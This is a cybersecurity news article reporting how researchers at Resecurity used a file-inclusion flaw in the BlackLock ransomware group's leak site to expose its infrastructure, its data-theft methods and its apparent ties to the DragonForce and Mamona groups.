In a dramatic twist of cyber warfare, threat hunters have turned the tables on BlackLock ransomware. A fast-growing cybercrime syndicate—by infiltrating its own infrastructure and uncovering sensitive internal data that exposes the group’s operations.
The breakthrough came from cybersecurity firm Resecurity, which discovered a critical vulnerability in the group’s data leak site (DLS). This flaw, tied to a misconfigured server, allowed researchers to access configuration files, credentials. And even a detailed history of commands executed on the backend—shedding unprecedented light on BlackLock’s tactics.
According to Resecurity, the vulnerability revealed clearnet IP addresses tied to the group’s hidden TOR services. Breaking through the anonymity layer the hackers relied on. In what’s now being called one of the most significant operational security (OPSEC) failures in recent ransomware history. BlackLock’s veil has been lifted—at least in part.
Originally operating under the name Eldorado, BlackLock rebranded and surged in activity throughout early 2025. Emerging as a major player in the ransomware-as-a-service (RaaS) ecosystem. By February, the group had publicly listed 46 victims across various sectors including finance, manufacturing, construction, retail, and technology.
Victims of BlackLock span multiple countries: from the United States and United Kingdom to Argentina, Aruba, Brazil, France, Italy, and the UAE, highlighting the group’s wide global footprint.
In January 2025, BlackLock launched an underground affiliate program to expand its reach. The group actively recruited traffers—low-level cybercriminals tasked with directing victims to malicious web pages that initiate infection chains. These malware strains provide initial access for deeper attacks and ransomware deployment.
The key vulnerability exploited by Resecurity is a Local File Inclusion (LFI) bug. Through this, researchers were able to trick the web server into revealing sensitive internal files via path traversal. A tactic often used in pentesting, but rarely pulled off this effectively against a live ransomware operation.
Among the most revealing findings:
- BlackLock operators used Rclone to siphon stolen data to MEGA cloud storage, at times installing the MEGA client directly on victim systems.
- Researchers traced at least eight MEGA accounts created using disposable YOPmail addresses, such as “[email protected].”
- Source code and ransom notes bear strong resemblance to another known ransomware family, DragonForce, which previously targeted Saudi Arabian entities. While DragonForce is written in Visual C++, BlackLock’s variant is developed in Go.
- A key figure known as “$$$” briefly operated another ransomware strain, Mamona, launched on March 11, 2025, suggesting internal splits or experimental offshoots within the group.
The plot thickened on March 20, when BlackLock’s DLS was defaced by DragonForce. Configuration files and internal chat logs were dumped on its landing page in an apparent hijack. One day earlier, Mamona’s site had also been defaced. Security experts believe DragonForce may have exploited the same LFI flaw—raising questions about whether this was a coordinated takeover, retaliation, or a sign of deeper collaboration.
Resecurity noted that the hacker known as “$$$” showed no reaction after these breaches. That silence, combined with the timing, suggests the actor may have already anticipated the collapse and quietly exited the scene before things escalated.
While it remains unclear if BlackLock is now under new ownership or merging into DragonForce, experts say this could reflect a larger trend of ransomware market consolidation. With heightened law enforcement pressure and increased surveillance from the infosec community, smaller ransomware operations are either folding or joining forces under larger, more resilient umbrellas.
This rare glimpse into BlackLock’s backend highlights both the rising complexity of modern ransomware groups and their vulnerabilities. While cybercriminals continue to evolve, this incident shows that even the most elusive actors can make critical mistakes—and when they do, it creates valuable openings for defenders to strike back.
